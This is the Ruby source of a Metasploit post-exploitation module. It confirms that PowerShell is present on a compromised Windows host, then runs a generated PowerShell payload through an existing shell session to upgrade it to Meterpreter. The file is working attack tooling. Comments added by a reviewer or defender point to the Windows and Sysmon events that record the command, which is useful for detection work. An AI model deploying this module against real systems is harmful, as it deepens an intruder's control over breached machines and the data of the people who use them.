##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'msf/core/exploit/powershell'

# Local module that upgrades an existing Windows command-shell session to a
# Meterpreter session by running a PowerShell command line inside that shell.
#
# Defender note: the only host-side action visible in this file is one command
# executed through the existing shell after a file-existence check. Process
# creation auditing with command-line capture (Windows Security event 4688,
# Sysmon event 1) and PowerShell script block logging (event 4104) are the
# usual places such an invocation is recorded.
class Metasploit3 < Msf::Exploit::Local
  Rank = ExcellentRanking

  # cmd_psh_payload is not defined in this file; presumably supplied by this mixin.
  include Exploit::Powershell
  # file? is not defined in this file; presumably supplied by this mixin.
  include Post::File

  # Registers the module metadata with the framework.
  #
  # @param info [Hash] caller-supplied metadata, merged via update_info
  def initialize(info = {})
    module_info = update_info(
      info,
      'Name'           => 'Windows Command Shell Upgrade (Powershell)',
      'Description'    => %q{ This module executes Powershell to upgrade a Windows Shell session to a full Meterpreter session. },
      'License'        => MSF_LICENSE,
      'Author'         => [ 'Ben Campbell' ],
      'DefaultOptions' => { 'WfsDelay' => 10, },
      # NOTE(review): looks like a placeholder date rather than a real disclosure - confirm.
      'DisclosureDate' => 'Jan 01 1999',
      'Platform'       => [ 'win' ],
      # Only plain shell sessions are accepted as the starting point.
      'SessionTypes'   => [ 'shell' ],
      'Targets'        => [ [ 'Universal', {} ] ],
      'DefaultTarget'  => 0
    )

    super(module_info)
  end

  # Checks that powershell.exe exists under %WINDIR%\System32 on the session
  # host and, if so, runs the PowerShell command line built from the payload.
  #
  # Only the System32 location is probed; a host with PowerShell installed
  # elsewhere is reported as not vulnerable.
  def exploit
    relative_psh = "\\WindowsPowerShell\\v1.0\\powershell.exe"

    # Guard clause: stop here when the binary is absent.
    # NOTE(review): relies on fail_with raising so nothing below runs - confirm.
    unless file?("%WINDIR%\\System32#{relative_psh}")
      fail_with(Exploit::Failure::NotVulnerable, "No powershell available.")
    end

    print_status("Executing powershell command line...")
    # The command is built from the encoded payload and the first architecture
    # listed for the payload instance; its exact form is decided by the helper.
    psh_command = cmd_psh_payload(payload.encoded, payload_instance.arch.first)
    cmd_exec(psh_command)
  end
end